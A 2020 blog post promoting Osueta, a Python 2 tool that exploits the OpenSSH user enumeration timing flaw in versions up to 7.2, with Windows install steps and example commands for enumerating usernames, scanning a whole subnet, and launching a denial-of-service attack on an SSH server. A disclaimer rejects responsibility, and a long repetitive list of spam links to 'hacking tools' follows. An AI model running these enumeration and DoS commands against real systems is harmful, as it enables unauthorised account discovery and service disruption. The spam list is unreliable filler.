Tuesday, August 25, 2020

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack


About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes


   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes


   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 


   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50


More info


  1. Hack Website Online Tool
  2. Hack Apps
  3. Pentest Tools Url Fuzzer
  4. Hacking Tools Download
  5. Hack Tools For Games
  6. Hack Tools For Games
  7. Hacking Apps
  8. Termux Hacking Tools 2019
  9. Pentest Tools Apk
  10. Hacker Tools Hardware
  11. Hacker Tools Hardware
  12. Pentest Tools Alternative
  13. How To Make Hacking Tools
  14. New Hacker Tools
  15. Free Pentest Tools For Windows
  16. Pentest Tools
  17. Hacking Tools Pc
  18. Beginner Hacker Tools
  19. Pentest Tools Free
  20. Hacking Tools Online
  21. Hack Tools Pc
  22. Hack Website Online Tool
  23. Pentest Tools Windows
  24. Black Hat Hacker Tools
  25. Pentest Tools Open Source
  26. Pentest Reporting Tools
  27. Hacker Tools Hardware
  28. Best Hacking Tools 2020
  29. Hacking Tools For Pc
  30. Tools 4 Hack
  31. Pentest Tools Framework
  32. Hacking App
  33. Hack Tools Pc
  34. Hacking App
  35. Pentest Tools Windows
  36. Hack Tools For Windows
  37. Bluetooth Hacking Tools Kali
  38. Hacker Tools 2019
  39. Pentest Tools Bluekeep
  40. Nsa Hack Tools
  41. Pentest Tools Bluekeep
  42. Pentest Tools Tcp Port Scanner
  43. Hacker Tools 2020
  44. Hacking Tools For Windows 7
  45. Hacking Tools For Pc
  46. Physical Pentest Tools
  47. Install Pentest Tools Ubuntu
  48. Black Hat Hacker Tools
  49. Pentest Tools For Ubuntu
  50. Hacking Tools Kit
  51. Growth Hacker Tools
  52. Nsa Hack Tools
  53. Hacking Tools Hardware
  54. Hacking Tools Hardware
  55. Hacking Tools Hardware
  56. Hacker Tools Free
  57. Bluetooth Hacking Tools Kali
  58. Hacking Tools Github
  59. Pentest Tools Subdomain
  60. Black Hat Hacker Tools
  61. Hacker Tools
  62. Hack And Tools
  63. Hacking App
  64. Hacking Tools Windows
  65. Pentest Tools Port Scanner
  66. Hack Tools Download
  67. Hacking Tools For Games
  68. Pentest Tools Website
  69. Hack Tools Online

No comments:

Post a Comment